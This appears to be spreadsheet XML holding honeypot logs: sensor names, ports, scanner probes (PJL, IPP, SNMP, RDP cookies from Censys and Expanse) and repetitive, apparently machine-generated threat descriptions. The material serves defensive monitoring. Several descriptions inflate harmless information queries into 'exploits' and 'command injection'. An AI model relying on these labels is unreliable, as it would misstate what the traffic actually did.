    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_LDAP_H25&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MSSQL_H14&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_MYSQL_H2&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_SOCKS5_H13&amp;&amp;SMA-LAB_SOCKS5_H35&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_MYSQL_H30&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_MYSQL_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;62366&amp;&amp;161&amp;&amp;5432&amp;&amp;6379&amp;&amp;143&amp;&amp;445&amp;&amp;1433&amp;&amp;389&amp;&amp;5900&amp;&amp;33007&amp;&amp;3306&amp;&amp;3389&amp;&amp;21&amp;&amp;53762&amp;&amp;110&amp;&amp;8443&amp;&amp;9100&amp;&amp;80&amp;&amp;1521&amp;&amp;55699&amp;&amp;55109&amp;&amp;23&amp;&amp;51571</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;stshash&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=RkSHszSFg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GmjXLE'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JmFHVl'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JNLUrbaZj'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XkjmGh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iINQpE'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hrWzLrpBF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hmngoO'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OeFDAc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qcUVvbiGP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KzGJZQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=myVznu'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=emBdHw'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kwQrpN'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f93</t>
  </si>
  <si>
    <t>Potential printing abuse or hacking attempt through printer control, where an unauthorized command is sent to the device. The command appears to be retrieving information about the device. This could be a reconnaissance step by an attacker. &amp;&amp; Possible malicious activity involves a remote printer management exploit, where an attacker is sending a fake administrative command to gain unauthorized access and control over the system's printers or print services. This could be used for eavesdropping on sensitive data or spreading malware through print jobs. The attack may also allow attackers to disrupt normal printing operations. &amp;&amp; Possible malicious activity involves sending unauthorized printer control commands, potentially for exploitation or unauthorized print jobs. This could be an attempt to take control of a printer system. Data is being manipulated with printer-specific commands. &amp;&amp; Possible malicious activity is an attempt to retrieve printer information, possibly as part of a reconnaissance or exploitation effort. This could be a prelude to unauthorized access or further attacks on the system. The command suggests a targeted attack on printing services. &amp;&amp; The presence of this log entry suggests a possible attempt to extract printer information, likely for malicious purposes such as exploiting vulnerabilities or gathering sensitive data about the system's internal workings. This could be part of a larger reconnaissance effort by an attacker. The extracted information may then be used to inform further attacks. &amp;&amp; Possible malicious activity is a printer exploitation attempt, where an attacker sends a command to gather printer information. The command appears to be specific to a particular type of printer driver. This could be the first step in further attacks on the network. &amp;&amp; Malicious entity attempting to exploit printer functionality for unauthorized access or data retrieval through a specific command. 
This is an indication of potential print job tampering or information gathering activity. 
Possible attempt to inject malicious code or commands into the printer system. &amp;&amp; The data indicates an attempt to send a printer identification request, which is unusual and may be a probing or reconnaissance activity by an attacker. This could be a prelude to further malicious activities such as exploitation of vulnerabilities in the printer or adjacent systems. The attacker is gathering information about the target system. &amp;&amp; Malicious party attempting to send printer job control commands, possibly probing for vulnerabilities or testing unauthorized access.
 Command sent to print server appears suspicious and could be a reconnaissance attempt.
 Printer job control language used inappropriately, indicating potential security risk. &amp;&amp; Possible malicious activity is unauthorized printer command execution, likely an attempt to exploit printer functionality for malicious purposes, possibly for reconnaissance or further attack. The attacker may be trying to gather information about the system's configuration or capabilities. This could be a sign of a targeted print-based vulnerability exploitation. &amp;&amp; Malicious actor is attempting to execute a command on a printer, likely for unauthorized access or control. This indicates a potential print server exploitation attempt. Command injection attack is underway. &amp;&amp; Malicious actor attempting to gather printer information by sending a specific command to potentially exploit sensitive data or manipulate device settings. This may be a reconnaissance attempt for further exploitation. Printer access could be abused for unauthorized purposes. &amp;&amp; Possible malicious activity: Unauthorized printer commands being sent, likely attempting to print or gain access to device settings. This could be part of a larger attack targeting networked printers or printing infrastructure. Attempting to gather information about the device's configuration or capabilities. &amp;&amp; Possible malicious printer spooling activity detected, attempting to manipulate printer settings or inject malicious code through a print job. This may be an attempt to exploit a vulnerability for unauthorized access or data exfiltration. Printer settings manipulation could lead to further security risks. &amp;&amp; A malicious script is attempting to gather printer information, potentially as part of a larger attack. This could be an attempt to exploit unpatched vulnerabilities or scan for sensitive information. It may also indicate a broader reconnaissance effort. &amp;&amp; Malicious activity involves attempting to execute a printer command, potentially for unauthorized access or data manipulation via a remote connection. This behavior may be indicative of an attack aimed at exploiting printer functionality for malicious purposes. The attacker is trying to extract information from the system using this printer command.</t>
  </si>
  <si>
    <t>Printer Attack &amp;&amp; Port Jiggering Attack &amp;&amp; Port Sniffing &amp;&amp; PortScan &amp;&amp; Scanning probe &amp;&amp; Printer Exploit &amp;&amp; Printer Exploit &amp;&amp; PortScan &amp;&amp; Port Scan &amp;&amp; Printer Scanning &amp;&amp; Printer Hack. &amp;&amp; Printer Hack &amp;&amp; Printer Exploit &amp;&amp; PortScan</t>
  </si>
  <si>
    <t>473d38cf133716c7aa77b984d7783b4c</t>
  </si>
  <si>
    <t>167.94.138.169</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Encryption Misuse</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MYSQL_H40&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_IRC_H3&amp;&amp;SMA-LAB_POP3_H46&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_FTP_H24&amp;&amp;SMA-LAB_SMTP_H3&amp;&amp;SMA-LAB_POSTGRES_H4&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_ORACLE_H31&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_IRC_H12&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_POP3_H28&amp;&amp;SMA-LAB_SSH_H45&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_SMTP_H34&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_IRC_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_POP3_H26&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_SOCKS5_H17&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_IPP_H9&amp;&amp;SMA-LAB_IPP_H46&amp;&amp;SMA-LAB_IPP_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_SIP_H21&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_RDP_H30&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_IRC_H16&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_ORACLE_H21&amp;&amp;SMA-LAB_IPP_H44&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_SMTP_H24&amp;&amp;SMA-LAB_IPP_H19&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_LDAP_H19&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_IRC_H19&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_IPP_H24&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_IRC_H40&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;3306&amp;&amp;21&amp;&amp;23&amp;&amp;6379&amp;&amp;NA&amp;&amp;6667&amp;&amp;110&amp;&amp;443&amp;&amp;25&amp;&amp;5432&amp;&amp;1080&amp;&amp;1521&amp;&amp;3389&amp;&amp;1433&amp;&amp;22&amp;&amp;28664&amp;&amp;5900&amp;&amp;631&amp;&amp;9100&amp;&amp;8443&amp;&amp;143&amp;&amp;389&amp;&amp;80&amp;&amp;123&amp;&amp;36338&amp;&amp;36348&amp;&amp;45354&amp;&amp;40131&amp;&amp;47156&amp;&amp;44538&amp;&amp;44554</t>
  </si>
  <si>
    <t>{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'ips.backscatterer.org': ['unknown']}</t>
  </si>
  <si>
    <t>Censys, Inc</t>
  </si>
  <si>
    <t>connection&amp;&amp;request&amp;&amp;login&amp;&amp;query&amp;&amp;command&amp;&amp;GET&amp;&amp;NA&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=42159'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.169,51916)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '95.164.21.98:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://95.164.21.98:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=45925'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=56403'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.181.21.224:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.181.21.224:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=38455'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_NTP:{'mode': '3', 'version': '3'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '156.244.37.11:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://156.244.37.11:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.169,46708)}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.169,50860)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=47458'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=36645'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.169,49612)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=47893'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '94.131.8.76:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.8.76:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.169,34062)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.169,43468)}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '91.194.11.82:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://91.194.11.82:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '194.146.12.172:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.146.12.172:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=48490'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.169;rport=33174'}}&amp;&amp;{Data_HTTP:{'Host': '94.131.118.77:40131', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77:40131', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.118.77:40131', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '194.4.48.242:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://194.4.48.242:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
